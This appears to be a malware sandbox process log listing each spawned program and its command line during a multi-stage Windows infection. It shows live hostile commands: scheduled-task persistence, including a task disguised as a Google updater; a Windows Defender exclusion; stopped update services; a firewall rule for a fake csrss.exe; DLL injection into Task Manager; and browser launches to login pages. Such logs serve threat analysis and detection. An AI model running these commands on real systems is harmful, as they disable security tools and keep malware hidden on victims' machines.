C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 552 -ip 552

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3428 -ip 3428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 552 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 /prefetch:3

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1940 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Users\Admin\AppData\Local\Temp\F15C.exe

C:\Users\Admin\AppData\Local\Temp\F15C.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Users\Admin\AppData\Local\Temp\F2C4.exe

C:\Users\Admin\AppData\Local\Temp\F2C4.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\14C.exe

C:\Users\Admin\AppData\Local\Temp\14C.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\138F.exe

C:\Users\Admin\AppData\Local\Temp\138F.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\F0A.exe

C:\Users\Admin\AppData\Local\Temp\F0A.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5660 -ip 5660

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\7B6.exe

C:\Users\Admin\AppData\Local\Temp\7B6.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp" /SL5="$40250,3039358,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "HAC1030-3"

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -i

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -s

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5992 -ip 5992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5244 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x49c 0x338

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6396 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8412 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8860 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8348 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7656 /prefetch:1

